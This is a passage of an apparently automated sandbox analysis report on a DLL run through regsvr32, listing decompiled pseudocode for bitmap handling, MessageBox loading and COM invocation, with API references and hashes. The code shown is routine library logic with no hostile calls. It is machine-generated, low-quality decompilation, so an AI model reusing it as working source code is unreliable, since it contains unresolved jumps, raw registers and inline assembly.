                                                                                                            				_t78 = _t54;
                                                                                                            				_v12 = _t78;
                                                                                                            				if(_t78 == 0) {
                                                                                                            					L17:
                                                                                                            					return _t54;
                                                                                                            				}
                                                                                                            				_t99 =  *_t78 + 0x40;
                                                                                                            				_t54 = E100107B6( *_t78 + 0x40);
                                                                                                            				_t105 = _t54;
                                                                                                            				if(_t105 == 0) {
                                                                                                            					L16:
                                                                                                            					goto L17;
                                                                                                            				} else {
                                                                                                            					E10011440(_t105, _t78, _t99);
                                                                                                            					_t102 = _t105 + _t105->bmiHeader;
                                                                                                            					_a8 = _a8 & 0x00000000;
                                                                                                            					do {
                                                                                                            						_t84 =  *(_t102 + _a8 * 4);
                                                                                                            						_t56 = 0;
                                                                                                            						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
                                                                                                            							_t56 = _t56 + 1;
                                                                                                            							if(_t56 < 4) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						__eflags = _a12;
                                                                                                            						if(_a12 == 0) {
                                                                                                            							_t80 = 0x1003f064 + _t56 * 8;
                                                                                                            							_v8 = _t80;
                                                                                                            							_a4 = GetSysColor( *_t80) & 0x000000ff;
                                                                                                            							_a4 = GetSysColor( *_t80) << 8;
                                                                                                            							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
                                                                                                            							__eflags = _t89;
                                                                                                            							 *(_t102 + _a8 * 4) = _t89;
                                                                                                            						} else {
                                                                                                            							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								 *(_t102 + _a8 * 4) = 0xffffff;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L12:
                                                                                                            						_a8 = _a8 + 1;
                                                                                                            					} while (_a8 < 0x10);
                                                                                                            					_t103 = _t105->bmiHeader.biWidth;
                                                                                                            					_t81 = _t105->bmiHeader.biHeight;
                                                                                                            					_a4 = _t103;
                                                                                                            					_a8 = _t81;
                                                                                                            					_t65 = GetDC(0);
                                                                                                            					_a12 = _t65;
                                                                                                            					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
                                                                                                            					_v8 = _t66;
                                                                                                            					if(_t66 != 0) {
                                                                                                            						_t70 = CreateCompatibleDC(_a12);
                                                                                                            						_t81 = SelectObject;
                                                                                                            						_t103 = _t70;
                                                                                                            						_v16 = SelectObject(_t103, _v8);
                                                                                                            						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
                                                                                                            						SelectObject(_t103, _v16);
                                                                                                            						DeleteDC(_t103);
                                                                                                            					}
                                                                                                            					ReleaseDC(0, _a12);
                                                                                                            					_push(_t105);
                                                                                                            					E100107C8(_t81, _t103, _t105, 0);
                                                                                                            					FreeResource(_v20);
                                                                                                            					_t54 = _v8;
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            			}

























                                                                                                            0x1002b6ff
                                                                                                            0x1002b705
                                                                                                            0x1002b706
                                                                                                            0x1002b70f
                                                                                                            0x1002b715
                                                                                                            0x00000000
                                                                                                            0x1002b715

                                                                                                            APIs
                                                                                                            • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B635
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B643
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B658
                                                                                                            • GetDC.USER32(00000000), ref: 1002B68A
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                                                            • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                                                            • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                                                            • ReleaseDC.USER32 ref: 1002B6FF
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2552574679-0
                                                                                                            • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                                                            • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                                                            				char _v8;
                                                                                                            				signed char _v12;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr* _t13;
                                                                                                            				intOrPtr* _t14;
                                                                                                            				intOrPtr* _t17;
                                                                                                            				void* _t19;
                                                                                                            				_Unknown_base(*)()* _t23;
                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                            				void* _t28;
                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t28 = 0;
                                                                                                            				_t33 =  *0x1004f824 - _t28; // 0x0
                                                                                                            				if(_t33 != 0) {
                                                                                                            					L6:
                                                                                                            					_t13 =  *0x1004f830; // 0x0
                                                                                                            					if(_t13 == 0) {
                                                                                                            						L14:
                                                                                                            						_t14 =  *0x1004f828; // 0x0
                                                                                                            						if(_t14 != 0) {
                                                                                                            							_t28 =  *_t14();
                                                                                                            							if(_t28 != 0) {
                                                                                                            								_t17 =  *0x1004f82c; // 0x0
                                                                                                            								if(_t17 != 0) {
                                                                                                            									_t28 =  *_t17(_t28);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            						return  *0x1004f824(_t28, _a4, _a8, _a12);
                                                                                                            					}
                                                                                                            					_t19 =  *_t13();
                                                                                                            					if(_t19 == 0) {
                                                                                                            						L10:
                                                                                                            						if( *0x1004f3ec < 4) {
                                                                                                            							_a14 = _a14 | 0x00000004;
                                                                                                            						} else {
                                                                                                            							_a14 = _a14 | 0x00000020;
                                                                                                            						}
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					_push( &_v8);
                                                                                                            					_push(0xc);
                                                                                                            					_push( &_v20);
                                                                                                            					_push(1);
                                                                                                            					_push(_t19);
                                                                                                            					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t31 = LoadLibraryA("user32.dll");
                                                                                                            				if(_t31 == 0) {
                                                                                                            					L12:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                                                            				 *0x1004f824 = _t23;
                                                                                                            				if(_t23 == 0) {
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
                                                                                                            					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
                                                                                                            					if( *0x1004f3e0 == 2) {
                                                                                                            						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                                                            						 *0x1004f834 = _t26;
                                                                                                            						if(_t26 != 0) {
                                                                                                            							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                            • API String ID: 2238633743-1612076079
                                                                                                            • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                                                            • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 48%
                                                                                                            			E10039B26(intOrPtr __ecx) {
                                                                                                            				signed int __ebx;
                                                                                                            				signed int __edi;
                                                                                                            				CHAR* __esi;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t164;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				signed int _t172;
                                                                                                            				signed int _t174;
                                                                                                            				signed int _t178;
                                                                                                            				void* _t192;
                                                                                                            				signed short _t203;
                                                                                                            				signed int _t204;
                                                                                                            				signed int _t205;
                                                                                                            				signed int* _t207;
                                                                                                            				signed int _t209;
                                                                                                            				void* _t213;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t217;
                                                                                                            				signed short* _t224;
                                                                                                            				void* _t233;
                                                                                                            				CHAR* _t235;
                                                                                                            				signed int _t236;
                                                                                                            				intOrPtr* _t237;
                                                                                                            				void* _t238;
                                                                                                            				void* _t239;
                                                                                                            				signed short _t242;
                                                                                                            				signed int _t243;
                                                                                                            				intOrPtr _t244;
                                                                                                            				signed short* _t245;
                                                                                                            				signed int** _t246;
                                                                                                            				void* _t247;
                                                                                                            				void* _t249;
                                                                                                            				void* _t250;
                                                                                                            				void* _t253;
                                                                                                            				void* _t263;
                                                                                                            
                                                                                                            				E10011BF0(0x1003b377, _t247);
                                                                                                            				_t250 = _t249 - 0x60;
                                                                                                            				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
                                                                                                            				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
                                                                                                            				_t214 = 0;
                                                                                                            				 *(_t247 - 0x20) = _t161;
                                                                                                            				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                                                            					E10011C50(_t247 - 0x4c, 0, 0x10);
                                                                                                            					_t235 =  *(_t247 + 0x18);
                                                                                                            					_t253 = _t250 + 0xc;
                                                                                                            					if(_t235 == 0) {
                                                                                                            						_t164 =  *(_t247 - 0x44);
                                                                                                            					} else {
                                                                                                            						_t164 = lstrlenA(_t235);
                                                                                                            						 *(_t247 - 0x44) = _t164;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
                                                                                                            					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
                                                                                                            						 *((intOrPtr*)(_t247 - 0x40)) = 1;
                                                                                                            						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
                                                                                                            					}
                                                                                                            					if(_t164 != _t214) {
                                                                                                            						_t244 = E1001F77E(_t164 << 4);
                                                                                                            						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
                                                                                                            						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
                                                                                                            						_t253 = _t253 + 0x10;
                                                                                                            						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
                                                                                                            						 *(_t247 - 0x14) = _t235;
                                                                                                            						 *(_t247 - 0x10) = _t245;
                                                                                                            						if( *_t235 != 0) {
                                                                                                            							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
                                                                                                            							_t246 =  &(_t245[4]);
                                                                                                            							_t22 = _t200 - 4; // 0xfffffff9
                                                                                                            							_t217 = _t22;
                                                                                                            							 *(_t247 - 0x18) = _t246;
                                                                                                            							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
                                                                                                            							_t238 = 4;
                                                                                                            							do {
                                                                                                            								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
                                                                                                            								_t224 =  *(_t247 - 0x10);
                                                                                                            								 *_t224 = _t203;
                                                                                                            								if((_t203 & 0x00000040) != 0) {
                                                                                                            									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
                                                                                                            								}
                                                                                                            								_t204 =  *_t224 & 0x0000ffff;
                                                                                                            								_t263 = _t204 - 0x4002;
                                                                                                            								if(_t263 > 0) {
                                                                                                            									_t205 = _t204 - 0x4003;
                                                                                                            									__eflags = _t205 - 0x12;
                                                                                                            									if(_t205 <= 0x12) {
                                                                                                            										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
                                                                                                            											case 0:
                                                                                                            												goto L36;
                                                                                                            											case 1:
                                                                                                            												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            												_t217 = _t217 + _t238;
                                                                                                            												_t207 =  *_t217;
                                                                                                            												asm("sbb ecx, ecx");
                                                                                                            												 *_t207 =  ~( *_t207) & 0x0000ffff;
                                                                                                            												goto L37;
                                                                                                            											case 2:
                                                                                                            												goto L38;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									if(_t263 == 0) {
                                                                                                            										L36:
                                                                                                            										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            										_t217 = _t217 + _t238;
                                                                                                            										__eflags = _t217;
                                                                                                            										_t207 =  *_t217;
                                                                                                            										L37:
                                                                                                            										 *_t246 = _t207;
                                                                                                            									} else {
                                                                                                            										_t209 = _t204;
                                                                                                            										if(_t209 <= 0x13) {
                                                                                                            											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
                                                                                                            												case 0:
                                                                                                            													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            													_t217 = _t217 + _t238;
                                                                                                            													_t210 =  *_t217;
                                                                                                            													goto L16;
                                                                                                            												case 1:
                                                                                                            													goto L36;
                                                                                                            												case 2:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													 *__esi =  *( *(__ebp + 0x1c));
                                                                                                            													goto L38;
                                                                                                            												case 3:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													 *__esi =  *( *(__ebp + 0x1c));
                                                                                                            													goto L38;
                                                                                                            												case 4:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eflags = __ebx;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													__ecx =  *__eax;
                                                                                                            													goto L22;
                                                                                                            												case 5:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													_push(__eax);
                                                                                                            													 *(__ebp - 0x18) = __eax;
                                                                                                            													__imp__#2();
                                                                                                            													__eflags =  *(__ebp - 0x18);
                                                                                                            													 *__esi = __eax;
                                                                                                            													if( *(__ebp - 0x18) != 0) {
                                                                                                            														__eflags = __eax;
                                                                                                            														if(__eax == 0) {
                                                                                                            															goto L25;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													goto L38;
                                                                                                            												case 6:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													 *__ebx =  ~( *__ebx);
                                                                                                            													asm("sbb eax, eax");
                                                                                                            													L16:
                                                                                                            													 *_t246 = _t210;
                                                                                                            													goto L38;
                                                                                                            												case 7:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                            													__edi =  *(__ebp - 0x10);
                                                                                                            													__ebx = __ebx + 4;
                                                                                                            													__esi =  *__ebx;
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													__esi =  *(__ebp - 0x18);
                                                                                                            													_push(4);
                                                                                                            													_pop(__edi);
                                                                                                            													goto L38;
                                                                                                            												case 8:
                                                                                                            													L26:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													__eflags = __eax;
                                                                                                            													 *(__ebp - 0x18) = __eax;
                                                                                                            													if(__eax != 0) {
                                                                                                            														__eax = lstrlenA( *(__ebp - 0x18));
                                                                                                            														__eax = __eax + 1;
                                                                                                            														 *(__ebp - 0x24) = __eax;
                                                                                                            														__eax = __eax + __eax;
                                                                                                            														__eax = __eax + 3;
                                                                                                            														__eax = __eax & 0xfffffffc;
                                                                                                            														__eflags = __eax;
                                                                                                            														__eax = __esp;
                                                                                                            														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
                                                                                                            													}
                                                                                                            													_push(__eax);
                                                                                                            													__imp__#2();
                                                                                                            													__eflags =  *(__ebp - 0x18);
                                                                                                            													 *__esi = __eax;
                                                                                                            													if( *(__ebp - 0x18) != 0) {
                                                                                                            														__eflags = __eax;
                                                                                                            														if(__eax == 0) {
                                                                                                            															L25:
                                                                                                            															__eax = E1001CE3B(__ecx);
                                                                                                            															goto L26;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													__eax =  *(__ebp - 0x10);
                                                                                                            													 *( *(__ebp - 0x10)) = 8;
                                                                                                            													goto L38;
                                                                                                            												case 9:
                                                                                                            													goto L38;
                                                                                                            												case 0xa:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													 *__esi =  *__ebx;
                                                                                                            													goto L38;
                                                                                                            												case 0xb:
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__eax =  *(__ebp + 0x1c) + 8;
                                                                                                            													__ecx =  *__eax;
                                                                                                            													 *(__ebp + 0x1c) = __eax;
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													L22:
                                                                                                            													 *__esi = __ecx;
                                                                                                            													__esi[4] = __eax;
                                                                                                            													goto L38;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L38:
                                                                                                            								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
                                                                                                            								_t246 = _t246 - 0x10;
                                                                                                            								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
                                                                                                            								 *(_t247 - 0x18) = _t246;
                                                                                                            							} while ( *( *(_t247 - 0x14)) != 0);
                                                                                                            							_t235 =  *(_t247 + 0x18);
                                                                                                            							_t214 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t242 = 0;
                                                                                                            					E10010592(_t247 - 0x3c);
                                                                                                            					if( *(_t247 + 0x10) != _t214) {
                                                                                                            						_t242 = _t247 - 0x3c;
                                                                                                            					}
                                                                                                            					E10011C50(_t247 - 0x6c, _t214, 0x20);
                                                                                                            					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
                                                                                                            					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
                                                                                                            					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
                                                                                                            					_t172 =  *(_t247 - 0x44);
                                                                                                            					if(_t172 != _t214) {
                                                                                                            						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
                                                                                                            						_t242 = _t235;
                                                                                                            						if( *_t235 != 0) {
                                                                                                            							do {
                                                                                                            								_t192 =  *_t242;
                                                                                                            								if(_t192 == 8 || _t192 == 0xe) {
                                                                                                            									__imp__#9(_t214);
                                                                                                            								}
                                                                                                            								_t214 = _t214 - 0x10;
                                                                                                            								_t242 = _t242 + 1;
                                                                                                            								_t273 =  *_t242;
                                                                                                            							} while ( *_t242 != 0);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t247 - 0x4c)));
                                                                                                            					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
                                                                                                            					_pop(_t221);
                                                                                                            					if( *(_t247 + 0x18) >= 0) {
                                                                                                            						L63:
                                                                                                            						_t242 =  *(_t247 + 0x10);
                                                                                                            						__eflags = _t242;
                                                                                                            						if(_t242 != 0) {
                                                                                                            							__eflags = _t242 - 0xc;
                                                                                                            							if(_t242 != 0xc) {
                                                                                                            								_t174 = _t247 - 0x3c;
                                                                                                            								__imp__#12(_t174, _t174, 0, _t242);
                                                                                                            								_t236 = _t174;
                                                                                                            								__eflags = _t236;
                                                                                                            								if(_t236 < 0) {
                                                                                                            									__imp__#9(_t247 - 0x3c);
                                                                                                            									_push(_t236);
                                                                                                            									goto L67;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L68;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						__imp__#9(_t247 - 0x3c);
                                                                                                            						if( *(_t247 + 0x18) == 0x80020009) {
                                                                                                            							__eflags =  *(_t247 - 0x54);
                                                                                                            							if( *(_t247 - 0x54) != 0) {
                                                                                                            								 *(_t247 - 0x54)(_t247 - 0x6c);
                                                                                                            							}
                                                                                                            							_t178 = E1001F77E(0x20);
                                                                                                            							_pop(_t221);
                                                                                                            							 *(_t247 + 0x14) = _t178;
                                                                                                            							__eflags = _t178;
                                                                                                            							 *(_t247 - 4) = 0;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t243 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            							} else {
                                                                                                            								_push( *((intOrPtr*)(_t247 - 0x6c)));
                                                                                                            								_t221 = _t178;
                                                                                                            								_push(0);
                                                                                                            								_push(0);
                                                                                                            								_t243 = E10039A54(_t178, __eflags);
                                                                                                            							}
                                                                                                            							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
                                                                                                            							__eflags =  *(_t247 - 0x68);
                                                                                                            							_t237 = __imp__#6;
                                                                                                            							if( *(_t247 - 0x68) != 0) {
                                                                                                            								_t113 = _t243 + 0x18; // 0x18
                                                                                                            								_t221 = _t113;
                                                                                                            								E1000860E(_t113,  *(_t247 - 0x68));
                                                                                                            								 *_t237( *(_t247 - 0x68));
                                                                                                            							}
                                                                                                            							__eflags =  *(_t247 - 0x64);
                                                                                                            							if( *(_t247 - 0x64) != 0) {
                                                                                                            								_t117 = _t243 + 0xc; // 0xc
                                                                                                            								_t221 = _t117;
                                                                                                            								E1000860E(_t117,  *(_t247 - 0x64));
                                                                                                            								 *_t237( *(_t247 - 0x64));
                                                                                                            							}
                                                                                                            							__eflags =  *(_t247 - 0x60);
                                                                                                            							if( *(_t247 - 0x60) != 0) {
                                                                                                            								_t121 = _t243 + 0x14; // 0x14
                                                                                                            								_t221 = _t121;
                                                                                                            								E1000860E(_t121,  *(_t247 - 0x60));
                                                                                                            								 *_t237( *(_t247 - 0x60));
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
                                                                                                            							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
                                                                                                            							 *(_t247 + 0x14) = _t243;
                                                                                                            							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
                                                                                                            							goto L63;
                                                                                                            						} else {
                                                                                                            							_push( *(_t247 + 0x18));
                                                                                                            							L67:
                                                                                                            							E100387D9(_t221);
                                                                                                            							L68:
                                                                                                            							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
                                                                                                            							if(_t161 <= 0x13) {
                                                                                                            								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
                                                                                                            									case 0:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 1:
                                                                                                            										__ecx =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 2:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 3:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 4:
                                                                                                            										__ecx =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *__eax =  *(__ebp - 0x34);
                                                                                                            										__ecx =  *(__ebp - 0x30);
                                                                                                            										 *(__eax + 4) =  *(__ebp - 0x30);
                                                                                                            										goto L79;
                                                                                                            									case 5:
                                                                                                            										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
                                                                                                            										_push( *(__ebp - 0x34));
                                                                                                            										__imp__#6();
                                                                                                            										goto L79;
                                                                                                            									case 6:
                                                                                                            										__ecx =  *(__ebp + 0x14);
                                                                                                            										__eax = 0;
                                                                                                            										__eflags =  *(__ebp - 0x34) - __bx;
                                                                                                            										__eax = 0 | __eflags != 0x00000000;
                                                                                                            										 *( *(__ebp + 0x14)) = __eflags != 0;
                                                                                                            										goto L79;
                                                                                                            									case 7:
                                                                                                            										__edi =  *(__ebp + 0x14);
                                                                                                            										__esi = __ebp - 0x3c;
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										goto L79;
                                                                                                            									case 8:
                                                                                                            										goto L79;
                                                                                                            									case 9:
                                                                                                            										_t161 =  *(_t247 + 0x14);
                                                                                                            										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
                                                                                                            										goto L79;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L79:
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
                                                                                                            				return _t161;
                                                                                                            			}






































                                                                                                            0x10039c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c7a
                                                                                                            0x10039c7d
                                                                                                            0x10039c7d
                                                                                                            0x10039c7f
                                                                                                            0x10039c81
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c90
                                                                                                            0x10039c93
                                                                                                            0x10039c95
                                                                                                            0x10039c97
